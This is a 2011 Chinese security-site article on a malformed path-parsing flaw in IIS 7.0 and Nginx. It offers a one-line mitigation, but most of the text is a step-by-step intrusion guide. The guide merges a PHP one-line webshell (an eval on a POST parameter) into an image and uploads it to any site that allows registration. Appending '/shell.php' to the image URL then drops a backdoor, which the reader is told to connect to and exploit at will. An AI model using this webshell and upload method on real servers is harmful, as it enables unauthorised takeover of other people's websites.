首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
IIS7.0畸形解析漏洞通杀0day
来源:vfocus.net 作者:vfocus 发布时间:2011-03-21  

IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。


临时解决办法:关闭cgi.fix_pathinfo为0


__________________________________

先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
先合并一张PHP一句话图片马,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"
图片随便找一张.
一句话:<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[akt])?>');?>
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
比如假设图片地址为 www.xxx.com/tupian/1.jpg
则执行地址为 www.xxx.com/tupian/1.jpg/shell.php
然后,会在目录下生成shell.php。比如: www.xxx.com/tupian/shell.php
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
剩下的就随便你去搞吧。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·快客电邮(QuarkMail)远程命令执
·DodeCMS成创网站内容管理系统 上
·freetextbox编辑器0day
·防注入程序拿shell
·Symantec LiveUpdate Administra
·Discuz!后台拿Webshell 0day
·建站之星SiteStar V2.0 上传漏洞
·蓝科企业网站管理系统中英繁版V1
·DedeCMS. 织梦科技注入爆管理员
·boblog任意变量覆盖漏洞(二)
·乔客(joekoe) CMS 4.0 上传与SQL
·5U CMS v1.2.2024 SQL注入漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved